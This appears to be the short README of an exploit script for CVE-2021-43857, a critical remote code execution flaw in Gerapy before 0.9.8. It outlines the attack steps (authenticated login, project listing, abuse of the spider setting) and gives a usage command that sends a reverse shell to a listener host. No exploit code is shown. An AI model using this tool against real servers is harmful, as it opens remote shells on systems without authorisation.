Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8.
CVE-2021-43857 is a vulnerability marked as Critical priority (CVSS 9.8) leading to remote code execution.
This vulnerability works on all versions prior to 0.9.8.
Tested only on 0.9.6. Needs correct credentials.
Exploit works by logging in to application, then getting the list of created projects (it will fail if there's none), then use the project setting to run the vulnerable spider mechanism by sending reverse shell payload.
Usage example:
python3 cve-2021-43857.py -t 172.17.0.2 -p 8000 -L 172.17.0.1 -P 4444
